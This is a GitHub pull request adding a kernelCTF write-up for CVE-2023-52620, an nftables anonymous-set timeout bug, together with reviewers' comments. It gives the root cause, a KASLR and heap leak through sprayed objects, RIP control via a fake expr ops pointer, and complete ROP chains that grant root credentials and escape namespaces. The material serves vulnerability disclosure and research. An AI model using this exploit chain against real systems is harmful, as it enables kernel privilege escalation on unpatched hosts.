-
Notifications
You must be signed in to change notification settings - Fork 412
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Add kernelCTF CVE-2023-52620_lts_cos_mitigation #117
base: master
Are you sure you want to change the base?
Changes from all commits
File filter
Filter by extension
Conversations
Jump to
Diff view
Diff view
There are no files selected for viewing
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,320 @@ | ||
# Overview | ||
|
||
This vulnerability was found in nftables and was patched in June 2023. However, the patch was mistakenly missed in the LTS version and the exploit was available in the LTS kernel for 8 months. Therefore, I reported this to the maintainer so that the patch could be committed to the LTS version. | ||
|
||
The vulnerability is caused by being able to set a timeout on an anonymous set. As shown in `nf_tables_newset`, there is no validation of an anonymous set when setting timeout. | ||
|
||
```c | ||
static int nf_tables_newset(struct sk_buff *skb, const struct nfnl_info *info, | ||
const struct nlattr * const nla[]) | ||
{ | ||
... | ||
desc.timeout = 0; | ||
if (nla[NFTA_SET_TIMEOUT] != NULL) { | ||
if (!(flags & NFT_SET_TIMEOUT)) | ||
return -EINVAL; | ||
|
||
err = nf_msecs_to_jiffies64(nla[NFTA_SET_TIMEOUT], &desc.timeout); | ||
if (err) | ||
return err; | ||
} | ||
... | ||
``` | ||
|
||
Binding an anonymous set to `lookup expr` and then deleting expr calls `nf_tables_deactivate_set`. This function calls `nft_map_deactivate` to deactivate objects mapped to elements of the set if it is an anonymous set. | ||
|
||
```c | ||
void nf_tables_deactivate_set(const struct nft_ctx *ctx, struct nft_set *set, | ||
struct nft_set_binding *binding, | ||
enum nft_trans_phase phase) | ||
{ | ||
... | ||
case NFT_TRANS_PREPARE: | ||
if (nft_set_is_anonymous(set)) { | ||
if (set->flags & (NFT_SET_MAP | NFT_SET_OBJECT)) | ||
nft_map_deactivate(ctx, set); | ||
|
||
nft_deactivate_next(ctx->net, set); | ||
} | ||
nft_use_dec(&set->use); | ||
return; | ||
... | ||
} | ||
``` | ||
|
||
Then, when the gc is executed in `nft_set_commit_update`, `nft_trans_gc_catchall_sync` calls `nft_setelem_data_deactivate` to deactivate the objects mapped to the set element. As a result, the `nft_chain` or `nft_object` mapped to the set element can be deactivated twice. | ||
|
||
```c | ||
struct nft_trans_gc *nft_trans_gc_catchall_sync(struct nft_trans_gc *gc) | ||
{ | ||
struct nft_set_elem_catchall *catchall, *next; | ||
const struct nft_set *set = gc->set; | ||
struct nft_set_elem elem; | ||
struct nft_set_ext *ext; | ||
|
||
WARN_ON_ONCE(!lockdep_commit_lock_is_held(gc->net)); | ||
|
||
list_for_each_entry_safe(catchall, next, &set->catchall_list, list) { | ||
ext = nft_set_elem_ext(set, catchall->elem); | ||
|
||
if (!nft_set_elem_expired(ext)) | ||
continue; | ||
|
||
gc = nft_trans_gc_queue_sync(gc, GFP_KERNEL); | ||
if (!gc) | ||
return NULL; | ||
|
||
memset(&elem, 0, sizeof(elem)); | ||
elem.priv = catchall->elem; | ||
|
||
nft_setelem_data_deactivate(gc->net, gc->set, &elem); | ||
nft_setelem_catchall_destroy(catchall); | ||
nft_trans_gc_elem_add(gc, elem.priv); | ||
} | ||
|
||
return gc; | ||
} | ||
``` | ||
|
||
# KASLR Bypass and Information Leak | ||
|
||
To bypass KASLR, I used the `struct nft_expr`, which stores the address of the `struct nft_expr_ops`. Since the address of `nft_expr_ops` is a kernel address, we can bypass KASLR by reading it. We can also get the heap address by reading the list in the `struct nft_rule`. This address will be used later to create fake ops and store the ROP payload. In this exploit, I used `nft_counter_ops`. | ||
|
||
```c | ||
struct nft_expr { | ||
const struct nft_expr_ops *ops; | ||
unsigned char data[] | ||
__attribute__((aligned(__alignof__(u64)))); | ||
}; | ||
``` | ||
|
||
```c | ||
struct nft_rule { | ||
struct list_head list; | ||
u64 handle:42, | ||
genmask:2, | ||
dlen:12, | ||
udata:1; | ||
unsigned char data[] | ||
__attribute__((aligned(__alignof__(struct nft_expr)))); | ||
}; | ||
``` | ||
|
||
When the vulnerability is triggered, the reference counter of `nft_chain` is decremented twice. Therefore, we used `immediate expr` to create a dangling pointer referencing this victim `nft_chain`. After binding `immediate expr` to the victim `nft_chain`, the dangling pointer is created by triggering the vulnerability to free the victim chain. The name of the freed chain can then be read through `immediate expr`. We spray `nft_expr` (`kmalloc-cg-16`) and `nft_rule` (`kmalloc-cg-96`) to the freed `chain->name` to read `nft_expr->ops` and `nft_rule->list` to get the kernel text address and heap address of `kmalloc-cg-96`. | ||
There was a problem hiding this comment. Choose a reason for hiding this commentThe reason will be displayed to describe this comment to others. Learn more. Please mention that |
||
|
||
For the mitigation kernel, we used a timing side channel attack to leak the kernel base, and created a fake ops in the non-randomized CPU entry area (CVE-2023-0597) without leaking the heap address. | ||
|
||
# RIP Control | ||
|
||
```c | ||
struct nft_chain { | ||
struct nft_rule_blob __rcu *blob_gen_0; | ||
struct nft_rule_blob __rcu *blob_gen_1; | ||
struct list_head rules; | ||
struct list_head list; | ||
struct rhlist_head rhlhead; | ||
struct nft_table *table; | ||
u64 handle; | ||
u32 use; | ||
u8 flags:5, | ||
bound:1, | ||
genmask:2; | ||
char *name; | ||
u16 udlen; | ||
u8 *udata; | ||
|
||
/* Only used during control plane commit phase: */ | ||
struct nft_rule_blob *blob_next; | ||
}; | ||
``` | ||
|
||
When the vulnerability is triggered, the freed `chain->blob_gen_0` can be accessed via `immediate expr`. | ||
There was a problem hiding this comment. Choose a reason for hiding this commentThe reason will be displayed to describe this comment to others. Learn more. If I understand correctly you are keeping the freed If it is, then please explain these details here. |
||
|
||
```c | ||
unsigned int | ||
nft_do_chain(struct nft_pktinfo *pkt, void *priv) | ||
{ | ||
... | ||
do_chain: | ||
if (genbit) | ||
blob = rcu_dereference(chain->blob_gen_1); | ||
else | ||
blob = rcu_dereference(chain->blob_gen_0); | ||
|
||
rule = (struct nft_rule_dp *)blob->data; | ||
last_rule = (void *)blob->data + blob->size; | ||
next_rule: | ||
regs.verdict.code = NFT_CONTINUE; | ||
for (; rule < last_rule; rule = nft_rule_next(rule)) { | ||
nft_rule_dp_for_each_expr(expr, last, rule) { | ||
if (expr->ops == &nft_cmp_fast_ops) | ||
nft_cmp_fast_eval(expr, ®s); | ||
else if (expr->ops == &nft_cmp16_fast_ops) | ||
nft_cmp16_fast_eval(expr, ®s); | ||
else if (expr->ops == &nft_bitwise_fast_ops) | ||
nft_bitwise_fast_eval(expr, ®s); | ||
else if (expr->ops != &nft_payload_fast_ops || | ||
!nft_payload_fast_eval(expr, ®s, pkt)) | ||
expr_call_ops_eval(expr, ®s, pkt); | ||
|
||
if (regs.verdict.code != NFT_CONTINUE) | ||
break; | ||
} | ||
``` | ||
|
||
```c | ||
static void expr_call_ops_eval(const struct nft_expr *expr, | ||
struct nft_regs *regs, | ||
struct nft_pktinfo *pkt) | ||
{ | ||
#ifdef CONFIG_RETPOLINE | ||
unsigned long e = (unsigned long)expr->ops->eval; | ||
#define X(e, fun) \ | ||
do { if ((e) == (unsigned long)(fun)) \ | ||
return fun(expr, regs, pkt); } while (0) | ||
|
||
X(e, nft_payload_eval); | ||
X(e, nft_cmp_eval); | ||
X(e, nft_counter_eval); | ||
X(e, nft_meta_get_eval); | ||
X(e, nft_lookup_eval); | ||
X(e, nft_range_eval); | ||
X(e, nft_immediate_eval); | ||
X(e, nft_byteorder_eval); | ||
X(e, nft_dynset_eval); | ||
X(e, nft_rt_get_eval); | ||
X(e, nft_bitwise_eval); | ||
#undef X | ||
#endif /* CONFIG_RETPOLINE */ | ||
expr->ops->eval(expr, regs, pkt); | ||
} | ||
``` | ||
|
||
`chain->blob_gen_0` is used in `nft_do_chain`, and `expr->ops->eval` is called to evaluate the expression in `expr_call_ops_eval`. We set the ops of the fake expr to the leaked heap address (LTS, COS) or CPU entry area (mitigation) to control the RIP. For LTS and COS kernel, the fake blob object with the fake expr is allocated in `kmalloc-cg-192`. For mitigation kernel, we allocate the fake blob object larger than 0x2000 to use page allocator. | ||
There was a problem hiding this comment. Choose a reason for hiding this commentThe reason will be displayed to describe this comment to others. Learn more. Make a comment somewhere why you chose |
||
|
||
# Post-RIP | ||
|
||
The ROP payload is stored in `chain->blob_gen_0` allocated in `kmalloc-cg-192` and the leaked heap address allocated in `kmalloc-cg-96`. | ||
There was a problem hiding this comment. Choose a reason for hiding this commentThe reason will be displayed to describe this comment to others. Learn more. Mention here that on COS Mention that where Also detail the differences between the ROP chains on LTS and COS (as they are different). |
||
|
||
```c | ||
void rop_chain_192(uint64_t* data){ | ||
int i = 0; | ||
|
||
data[i++] = 0x100; | ||
There was a problem hiding this comment. Choose a reason for hiding this commentThe reason will be displayed to describe this comment to others. Learn more. Comment here what field you are setting. Is it |
||
data[i++] = 0x100; | ||
There was a problem hiding this comment. Choose a reason for hiding this commentThe reason will be displayed to describe this comment to others. Learn more. Comment here what field you are setting. Is it |
||
|
||
// fake ops addr | ||
data[i++] = kmalloc_96; | ||
|
||
// current = find_task_by_vpid(getpid()) | ||
data[i++] = kbase + POP_RDI_RET | ||
data[i++] = getpid(); | ||
data[i++] = kbase + FIND_TASK_BY_VPID; | ||
|
||
// current += offsetof(struct task_struct, rcu_read_lock_nesting) | ||
data[i++] = kbase + POP_RSI_RET; | ||
data[i++] = RCU_READ_LOCK_NESTING_OFF; | ||
data[i++] = kbase + ADD_RAX_RSI_RET; | ||
|
||
// current->rcu_read_lock_nesting = 0 (Bypass rcu protected section) | ||
data[i++] = kbase + POP_RCX_RET; | ||
data[i++] = 0; | ||
data[i++] = kbase + MOV_RAX_RCX_RET; | ||
|
||
// commit_creds(&init_cred) | ||
data[i++] = kbase + POP_RDI_RET; | ||
data[i++] = kbase + INIT_CRED; | ||
data[i++] = kbase + COMMIT_CREDS; | ||
|
||
// find_task_by_vpid(1) | ||
data[i++] = kbase + POP_RDI_RET; | ||
data[i++] = 1; | ||
data[i++] = kbase + FIND_TASK_BY_VPID; | ||
|
||
// switch_task_namespaces(find_task_by_vpid(1), &init_nsproxy) | ||
data[i++] = kbase + MOV_RDI_RAX_RET; | ||
data[i++] = kbase + POP_RSI_RET; | ||
data[i++] = kbase + INIT_NSPROXY; | ||
data[i++] = kbase + SWITCH_TASK_NAMESPACES; | ||
|
||
data[i++] = kbase + POP_RSP_RET; | ||
data[i++] = kmalloc_96 + sizeof(uint64_t); | ||
} | ||
|
||
void rop_chain_96(uint64_t* data){ | ||
int i = 0; | ||
|
||
data[i++] = kbase + PUSH_RBX_POP_RSP; | ||
|
||
data[i++] = kbase + SWAPGS_RESTORE_REGS_AND_RETURN_TO_USERMODE; | ||
data[i++] = 0; | ||
data[i++] = 0; | ||
data[i++] = _user_rip; | ||
data[i++] = _user_cs; | ||
data[i++] = _user_rflags; | ||
data[i++] = _user_sp; | ||
data[i++] = _user_ss; | ||
} | ||
``` | ||
|
||
For mitigation kernel, the ROP payload is stored in `chain->blob_gen_0` which is allocated by page allocator. | ||
|
||
```c | ||
void rop_chain(uint64_t* data){ | ||
int i = 0; | ||
|
||
data[i++] = 0x100; | ||
There was a problem hiding this comment. Choose a reason for hiding this commentThe reason will be displayed to describe this comment to others. Learn more. Comment here what field you are setting. Is it |
||
data[i++] = 0x100; | ||
There was a problem hiding this comment. Choose a reason for hiding this commentThe reason will be displayed to describe this comment to others. Learn more. Comment here what field you are setting. Is it |
||
data[i++] = PAYLOAD_LOCATION(1) + offsetof(struct cpu_entry_area_payload, nft_expr_eval); | ||
|
||
// current = find_task_by_vpid(getpid()) | ||
data[i++] = kbase + POP_RDI_RET; | ||
data[i++] = getpid(); | ||
data[i++] = kbase + FIND_TASK_BY_VPID; | ||
|
||
// current += offsetof(struct task_struct, rcu_read_lock_nesting) | ||
data[i++] = kbase + POP_RSI_RET; | ||
data[i++] = RCU_READ_LOCK_NESTING_OFF; | ||
data[i++] = kbase + ADD_RAX_RSI_RET; | ||
|
||
// current->rcu_read_lock_nesting = 0 (Bypass rcu protected section) | ||
data[i++] = kbase + POP_RCX_RET; | ||
data[i++] = 0; | ||
data[i++] = kbase + MOV_RAX_RCX_RET; | ||
|
||
// Bypass "schedule while atomic": set oops_in_progress = 1 | ||
data[i++] = kbase + POP_RDI_RET; | ||
data[i++] = 1; | ||
data[i++] = kbase + POP_RSI_RET; | ||
data[i++] = kbase + OOPS_IN_PROGRESS; | ||
data[i++] = kbase + MOV_RSI_RDI_RET; | ||
|
||
// commit_creds(&init_cred) | ||
data[i++] = kbase + POP_RDI_RET; | ||
data[i++] = kbase + INIT_CRED; | ||
data[i++] = kbase + COMMIT_CREDS; | ||
|
||
// find_task_by_vpid(1) | ||
data[i++] = kbase + POP_RDI_RET; | ||
data[i++] = 1; | ||
data[i++] = kbase + FIND_TASK_BY_VPID; | ||
|
||
data[i++] = kbase + POP_RSI_RET; | ||
data[i++] = 0; | ||
|
||
// switch_task_namespaces(find_task_by_vpid(1), &init_nsproxy) | ||
data[i++] = kbase + MOV_RDI_RAX_RET; | ||
data[i++] = kbase + POP_RSI_RET; | ||
data[i++] = kbase + INIT_NSPROXY; | ||
data[i++] = kbase + SWITCH_TASK_NAMESPACES; | ||
|
||
data[i++] = kbase + SWAPGS_RESTORE_REGS_AND_RETURN_TO_USERMODE; | ||
data[i++] = 0; | ||
data[i++] = 0; | ||
data[i++] = _user_rip; | ||
data[i++] = _user_cs; | ||
data[i++] = _user_rflags; | ||
data[i++] = _user_sp; | ||
data[i++] = _user_ss; | ||
} | ||
``` |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Can you comment here more about how the reference counter changes of the
nft_chain
object?Let's consider the
chain_leak
: you use for theimmediate
expr, so the ref. counter becomes 1, then you set up the anonymous set and the lookup expression for the chain (ref count becomes 2), and then you wait for the timeout (ref count becomes 1) and then how the lookup expression is destroyed? Is it during thedel_chain
call?If yes, then the ref count becomes 0 at this point but the
immediate
expr is still referencing thenft_chain
object?